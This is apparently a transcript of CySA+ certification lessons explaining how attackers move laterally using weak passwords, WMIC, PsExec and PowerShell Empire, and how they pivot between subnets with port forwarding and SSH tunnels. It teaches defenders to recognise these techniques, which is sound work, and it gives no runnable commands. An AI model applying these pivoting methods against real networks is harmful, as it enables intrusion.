CompTIA CYSA+ CS0-002 – Analyzing Lateral Movement and Pivoting IOCs Part 2

5. Lateral Movement (OBJ 4.3)

Lateral movement. Now, we talked about lateral movement already, and I already provided a couple of examples or techniques that we can use for lateral movement as an attacker. If you’re working as a pen, tester things like pass the hash or a golden ticket attack. But there are other ones out there, too. And the idea is that an attacker can use any remote access protocol to move from host to host. One of the most common ways they do this is by relying on people using poor passwords. If you have employees in your organization, you can have employees that don’t follow good password practices. And the larger your organization, the more often this is going to be true.

For example, if we go forward and look at the top 30 passwords that are compromised, you’ll see that a lot of them are really kind of silly. For instance, who would set their password to 12345? Well, the reason that’s the number one most commonly hacked password is because a lot of people actually do it. And so if you have those people working in your organization, this can actually be something that can be a way that an attacker can laterally move throughout your organization by using different accounts on different machines, by going through some of these common passwords. For example, if you look there over on the third column, you’ll see one that looks pretty secure. Q-W-E-R-T-Y UIOP? Now, this one doesn’t look bad at first glance, but as you start looking at it, you see those letters look kind of familiar, even though they’re random.

Well, they’re actually the first line going across the top of your keyboard, and that’s why it’s a commonly used password. And so this is not secure, even though it doesn’t look like a standard dictionary word. Now let’s take a look at a couple more examples. As I went down the top 100 most commonly used passwords, I found two more that look pretty secure number 42 and number 62. Number 42 looks pretty secure. Q one w two e three r four t five y six now, at first glance, that looks pretty secure. But if you look at your keyboard again, all they’re doing is what’s known as keyboard walking. They’re alternating between the Q row and the number row and going q one, W two, E three all the way across. If you look at number 62, this one is doing the same thing but in reverse.

So again, just because it looks randomized doesn’t mean it is. And so you have to make sure that the passwords your employees are using are secure, because if they’re not using secure passwords, it’s a common way for an attacker to laterally move throughout your system. Now, insecure passwords are going to make our networks weak and much more susceptible to this lateral movement. So we want to make sure we’re doing frequent checks of our employees passwords using good tools as part of our security procedures. So again, remember, most systems rely on usernames and passwords for authentication. And if you’re using weak passwords, people are going to be able to break in. And when this is done with an administrator account, it’s really bad.

All right, so let’s keep in mind that we need those secure passwords and we want to make sure they’re safe and secure. Now, if we move beyond that, what are some of the other lateral movement techniques that an attacker can use? Well, they can use the same things that system administrators use. That includes things like remote access services, WMIC, PS, Exec, and Windows PowerShell. Now, these are tools that an assistant administrator uses to do their job, but an attacker can use them for their nefarious purposes as well. First, let’s talk about remote access services. This is any combination of hardware and software that enables the remote access tools or information that typically reside on a network of It devices.

Now, it’s a complicated way of saying this allows somebody to access a computer from a distance. Now, this can be really useful if you’re at home and you need to access your computer, be able to run something from the office even though you don’t have access to all the things. This might be something like a VPN or SSH or Telnet or other services like that. When you’re using things like SSH and Telnet and RDP and VNC, this can provide an attacker the ability to laterally move across the network. But they’re also useful for our users who need remote access. As I’m filming this right now, we’re actually in the middle of a worldwide pandemic and there is a lot more people working from home. And so remote access services are really needed right now.

But again, this becomes a major area of vulnerability that attackers will use against you and be able to laterally move around your network with. The second area we want to talk about is WMIC, which is the Windows Management Instrumentation Command Line. This provides users with a terminal interface and enables administrators to run scripts to manage those computers. Now, the great thing about WMIC as a system administrator is it gives you a lot of power. You can go forward and run scripts and run all sorts of different commands and perform tasks that require a higher level of privilege than normal. But again, if an attacker can get access to It, this becomes a great lateral movement tool for them.

Because they can run processes at higher levels of privilege than normal. They can also do crucial reconnaissance from a remote host. Using WMIC, they can do everything from looking at processes to dis partitions to BIOS data. All of this can be done through WMIC. And so it is a way that attackers use to laterally move throughout your network. Because of this, WMIC can be a vector in a postattack lateral movement. The next one we want to talk about is PS Exec. This is a tool that’s developed as an alternative to telnet and other remote access services which utilizes the Windows system account for privilege escalation. Again, this is a tool that was developed for system administrators. It is actually part of the Sysinternals tool suite that was developed by Mark Russenovich.

Now again, this is something that was developed for system administrators, but attackers use it for their own benefit as well. This allows them to be able to open back doors, run processes, and elevate permissions across the network on remote systems and run things there. The final thing we want to talk about is Windows PowerShell. Now, Windows PowerShell is a task automation and configuration management framework from Microsoft, and it comes by default embedded in your Windows system. It consists of a command line shell and an associated scripting language. Because of that, it gives a lot of power to system administrators and in turn, attackers. Attackers also have developed their own exploit kits. One of the most popular ones is known as the PowerShell Empire.

This toolkit contains numerous prebuilt attack modules and it allows an attacker with ease to go forward and run lots of different programs against your systems with prewritten modules and prewritten exploits. So once you’ve exploited a system, you can then run PowerShell Empire on it and you’ll be able to run all of these different modules. For example, here you can see there are 91 currently loaded modules that I could run against the victim system because of the way PowerShell was developed. It has native commandlets as well as the ability to run all sorts of different remote access WMIC and PS Exec tools inside of them as well through those PowerShell scripts. And you can even use these prebuilt modules from Empire as well. Bye.

6. Pivoting (OBJ 4.3)

Pivoting. Now, as I mentioned previously, there is a difference between pivoting and lateral movement. And so in this lesson we are going to focus on exactly what pivoting is and how it distinctly is different from lateral movement. Now, when we talk about pivoting, this is when an attacker uses a compromised host, the pivot, as a platform from which to spread an attack to other points in the network. When I talk more about lateral movement, this is more focused on when an attacker hops from one host to another in search of vulnerabilities for them to exploit. But once they start running those attacks from one point, that is the pivot point. Now, again, let me give you a quick word of warning here.

Lateral movement and pivoting, while they are different and we talk about them as separate concepts in this lesson, they are used interchangeably by a lot of cybersecurity professionals. So when you’re talking about this in the field, people will say lateral movement or pivoting to mean the same thing oftentimes. But for the exam, there is a difference. And so you need to remember the difference really comes down to if you have an attack point established and then you’re conducting your attacks from that point in the network, that is your pivot point. And I’ll go into that a little bit more in this lesson. Now, when we do Pivoting, one of the main things we have to do is we use port forwarding.

With port forwarding, this allows the attacker to use a host as a Pivot, and then we’ll be able to access one of its open TCP ports to send traffic from this port to the port of another host on a different subnet. Now, I know that sounds a little complicated, so I’m going to go ahead and show you graphically what this means. First, we have a host. This is host A inside the victim network. As an attacker, I’m going to find some way to exploit host A through some kind of exploit. Maybe I used a phishing campaign or maybe I found a vulnerability that I was able to exploit with some kind of zero day code or something like that. However, I got in, let’s just say host A has been had by an attacker and is now victimized. Then we have Host B.

The attacker might be conducting reconnaissance and identifying another target. So as I got into host A, I now start looking around and identify there’s this other host B. This is my looking out as a way of looking forward as the lateral movement that I may want to achieve later. And then I keep searching and I find that there’s also this host C depicted here as a server. And so I have access to host A because I have control over it due to my initial exploitation. Then as part of my reconnaissance, I might find that I can reach host B, but I can’t reach host c because it’s on a different subnet. If this is the case, I may decide to exploit host B instead. By doing this, I now can have some kind of an exploit shell between host A and B. For instance, I may have gotten into host B and set up a listener on it and then had a netcat connection between host A and B.

Now, that doesn’t give me access to C yet, but I might be able to find that host B is on the same subnet as host C and has the ability to reach it because of its network configuration. For example, the firewall might trust host B but doesn’t trust host A, so host B can get into that subnet. Now, as the attacker, I want to be able to get into host C, so how can I do that? Well, maybe I’m going to set up a port forwarder on host B. For example, if I wanted to use RDP, the remote desktop protocol, I would set up a portfolio of 3389 on host b that will forward the port 3389 from b over to c. Now, I would have the ability from b to establish a connection, but that still won’t get it all the way back to host a.

Which is where I actually have my footprint. So I would want to set up a listener on host A for port 3389, which again is RDP. This way, anything received on host B for port 3389 will get forwarded from B over to C, and we’re going to use it as a pass through point or a pivot point. So now as an attacker, I can initiate an RDP session with host C from host A by going through host B, and essentially I’m playing a telephone game. Anything I send to B is going to get redirected to C, and anything that goes from C to B gets redirected back to A. And so we’re just passing through B on our way to C. This allows the attacker to successfully pivot from host A through host B into host C, and that way we have a full RDP connection ongoing.

Now, that’s the way it looks when you’re doing this inside of a network graphically. And again, this is a very simplified diagram, but it gives you the idea of going through one host to another, and we’re pivoting through that host by doing that port forwarding. In addition to that, we can do this. Instead of using RDP, we could use SSH. With SSH, it’s actually really easy to use it for pivoting because you can use the dash D flag, which sets up a local proxy and port forwarding on a given target. And so this is something that is used a lot by attackers. For instance, you might have again, host A, host B, and host C. Now, host A can’t get to host C because it’s being blocked by the firewall, but host B can get to host C.

So what will we do? Well, we’ll create an SSH tunnel between A to B, and then we’ll pivot from B through the firewall over to host C, creating that connection and allowing host A to connect to host C through host B. Now, in both of my examples I showed you where we used a single pivot point, but attackers can actually chain their proxy servers together in order to continue pivoting from host to host until they reach a missioncritical. Host your server. For example, in one network I worked in, we had a very complex network setup with multiple different subnets where only certain ones could trust each other. And we had an attacker that actually found their way through three or four different subnetworks pivoting through until they got to the thing they were looking for.

For example, some networks may be built in a very complex manner, and you may have certain areas that are dedicated on certain subnets, like the accounting subnet, your credit card databases, maybe you have some ICS or SCADA that’s going to be on another network. And an attacker can actually pivot through multiple pivot points until they get into the particular networks they need to for the attack they’re trying to run. And so this is important to consider as people start chaining these proxy servers together to reach their end goal and into their end state.